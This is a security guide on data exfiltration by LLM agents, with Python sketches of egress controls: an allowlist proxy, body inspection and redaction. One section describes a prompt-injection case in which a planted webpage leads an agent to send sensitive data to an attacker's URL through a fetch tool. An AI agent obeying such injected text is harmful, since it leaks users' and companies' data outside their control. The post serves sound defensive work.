Data exfiltration, defined for the LLM era
Data exfiltration is the unauthorized transfer of data from a trusted system to an untrusted one. The textbook examples, a malicious insider with a USB stick, a compromised backup, or a misconfigured S3 bucket, assume a human or a long-lived process. LLM agents broke that assumption. An autonomous agent can exfiltrate data in seconds, in response to text it read on a webpage, using credentials it was legitimately granted.
Traditional DLP scans email attachments and Slack messages. It does not see fetch() calls from a Python agent loop. The center of gravity for data-loss prevention has moved to the agent's outbound network egress.
The four egress patterns that leak data
1. The helpful-summary leak
The agent reads internal docs, then is asked a follow-up that involves a web search. It silently includes excerpts of the internal docs in the search query. The search provider now has them. Multiply by every search call.
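One way to catch this pattern is to compare each outbound search query against the internal documents the agent has read in the current session. The sketch below is a minimal illustration, assuming word-level 5-gram overlap is a good enough signal; the function names and the threshold of five words are hypothetical choices, not an established standard.

```python
def shingles(text, n=5):
    """Return the set of n-word sequences (shingles) in text, lowercased."""
    words = text.lower().split()
    return {tuple(words[i:i + n]) for i in range(len(words) - n + 1)}


def leaks_excerpt(query, internal_docs, n=5):
    """True if the query shares any n-word run with an internal document."""
    query_shingles = shingles(query, n)
    return any(query_shingles & shingles(doc, n) for doc in internal_docs)


# Hypothetical internal doc the agent read earlier in the session.
docs = ["Q3 revenue fell 12 percent because the Acme renewal slipped to Q4"]

copied = leaks_excerpt(
    "why revenue fell 12 percent because the Acme renewal slipped", docs
)
generic = leaks_excerpt("average SaaS renewal rates 2024", docs)
```

Exact-overlap matching misses paraphrases, so a check like this is a floor rather than a complete defense.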
2. The tool-side-channel leak
The agent has a web_fetch tool. A prompt-injected page tells it to fetch https://attacker.com/?data=... with sensitive content URL-encoded into the query string. The model treats the instruction as part of its task and complies.
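A destination allowlist is the primary defense here, but an egress check can also flag query strings that carry unusually large values. The following is a rough sketch, assuming a length threshold is an acceptable heuristic; `MAX_PARAM_LEN` and `oversized_params` are hypothetical names, and the threshold would need tuning against real traffic.

```python
from urllib.parse import parse_qsl, urlsplit

MAX_PARAM_LEN = 256  # hypothetical threshold; tune against real traffic


def oversized_params(url, max_len=MAX_PARAM_LEN):
    """Return names of query parameters whose decoded value exceeds max_len."""
    query = urlsplit(url).query
    return [
        name
        for name, value in parse_qsl(query, keep_blank_values=True)
        if len(value) > max_len
    ]


normal = oversized_params("https://example.com/search?q=weather")
stuffed = oversized_params("https://attacker.com/?data=" + "A" * 500)
```

An attacker can split a payload across many short parameters or many requests, so this only raises the cost of the attack; it does not replace default-deny.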
3. The vendor-sprawl leak
The agent chains seven SaaS APIs. Each one logs requests. PII flows to all seven. You signed a DPA with two of them.
4. The error-message leak
An exception bubbles up containing a row of customer data. The agent's error handler ships it to a third-party observability tool with no redaction.
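A small redaction step in front of the error reporter narrows this leak. The sketch below assumes that emails and long digit runs are the sensitive patterns of interest; the regexes and the `safe_error_payload` helper are illustrative assumptions, not a complete PII detector.

```python
import re

# Illustrative patterns only; real deployments need a broader set.
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
LONG_DIGITS = re.compile(r"\b\d{9,}\b")  # card numbers, account IDs, phone numbers


def redact(text):
    """Replace emails and long digit runs with placeholders."""
    text = EMAIL.sub("[REDACTED_EMAIL]", text)
    return LONG_DIGITS.sub("[REDACTED_NUMBER]", text)


def safe_error_payload(exc):
    """Build the payload to send to an observability tool, with redaction."""
    return {"type": type(exc).__name__, "message": redact(str(exc))}


err = ValueError("bad row: ('jane@example.com', 4111111111111111)")
payload = safe_error_payload(err)
```

Applying the same redaction at the proxy covers error paths the application author forgot to wrap.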
Why prompt-side defenses are not enough
Telling the model "do not exfiltrate data" is a vibe, not a control. Fine-tuning helps at the margin. Output filtering catches the easy cases. None of these are auditable, none are testable in the way a security team needs, and all of them fail open when something in the chain breaks.
Auditable controls run on the wire. A request either matches your policy or it doesn't.
A network-layer DLP playbook for agents
- Enumerate the destinations the agent legitimately needs. Be specific. "OpenAI" is not a destination; api.openai.com is.
- Default-deny everything else. Including newly-registered lookalike domains. Especially those.
- Inspect request bodies for sensitive patterns. Customer IDs, API keys, PII, and the kind of free-text that looks like an internal doc. Redact or block.
- Require approval for new destinations. If the agent reasons its way into needing a new domain, that's a human-in-the-loop moment, not an auto-approve.
- Log everything with reasoning context. Not just "POST to X." Also "the agent was working on task Y and chose to call X because of Z."
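The playbook above can be sketched as a single policy function. This is a minimal illustration under stated assumptions: the allowlist contents, the two sensitive patterns (an API-key-like string and a made-up `CUST-` customer ID format), and the `Decision` type are all hypothetical, and a real proxy would write structured logs somewhere durable rather than printing them.

```python
import json
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.openai.com"}  # exact hostnames, not vendor names

# Hypothetical patterns: an API-key-like token and a made-up customer ID format.
SENSITIVE = [re.compile(r"sk-[A-Za-z0-9]{20,}"), re.compile(r"\bCUST-\d{6}\b")]


@dataclass
class Decision:
    action: str  # "allow", "block", or "needs_approval"
    reason: str


def evaluate(url, body, task):
    """Apply allowlist, body inspection, and logging to one outbound request."""
    host = (urlsplit(url).hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        # Default-deny: unknown hosts are held for a human, never auto-approved.
        decision = Decision("needs_approval", f"host {host!r} is not on the allowlist")
    elif any(p.search(body) for p in SENSITIVE):
        decision = Decision("block", "request body matched a sensitive pattern")
    else:
        decision = Decision("allow", "host is allowlisted and body is clean")
    # Log the decision together with the task the agent was working on.
    print(json.dumps({"task": task, "host": host,
                      "action": decision.action, "reason": decision.reason}))
    return decision


ok = evaluate("https://api.openai.com/v1/chat/completions", "hello", "summarize ticket")
lookalike = evaluate("https://api.openai.com.evil.io/v1", "hello", "summarize ticket")
leaky = evaluate("https://api.openai.com/v1/chat/completions",
                 "key: sk-" + "a" * 24, "summarize ticket")
```

Matching on the exact hostname is what defeats the lookalike domain: `api.openai.com.evil.io` starts with the trusted name but is a different host.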
Where this lives in your stack
The right place is a forward proxy the agent's HTTP client trusts. Drop it in via HTTPS_PROXY, an SDK config, or a sidecar; no application code changes are needed. The proxy terminates TLS, applies policy, and then forwards, rewrites, or denies the request. Your model code stays the same. Your egress posture goes from "trust the prompt" to "trust the policy."
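As a rough sketch of the environment-variable route, the helper below builds the environment for launching an agent process behind the proxy. The proxy URL, CA bundle path, and `proxied_env` name are assumptions for illustration. Because the proxy terminates TLS, the client must also trust the proxy's CA certificate; `SSL_CERT_FILE` is shown as one example, and which variable a given HTTP client honors varies by library.

```python
import os


def proxied_env(proxy_url, ca_bundle, base=None):
    """Return a copy of the environment that routes HTTP(S) through the proxy."""
    env = dict(os.environ if base is None else base)
    env["HTTPS_PROXY"] = proxy_url
    env["HTTP_PROXY"] = proxy_url
    # Assumption: the client reads its trusted CAs from SSL_CERT_FILE.
    env["SSL_CERT_FILE"] = ca_bundle
    return env


# Hypothetical proxy address and CA path.
env = proxied_env(
    "http://egress-proxy.internal:3128",
    "/etc/ssl/certs/egress-proxy-ca.pem",
    base={"PATH": "/usr/bin"},
)
# The result can be passed as env= to subprocess.run when starting the agent.
```

Environment variables are advisory: a client that ignores them bypasses the proxy, so pairing this with a network rule that blocks direct egress keeps the control enforceable.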
Data exfiltration is the easiest agent failure mode to ignore until it shows up in a postmortem. It is also the easiest to prevent with a control that lives in the one place the model can't argue with: the network.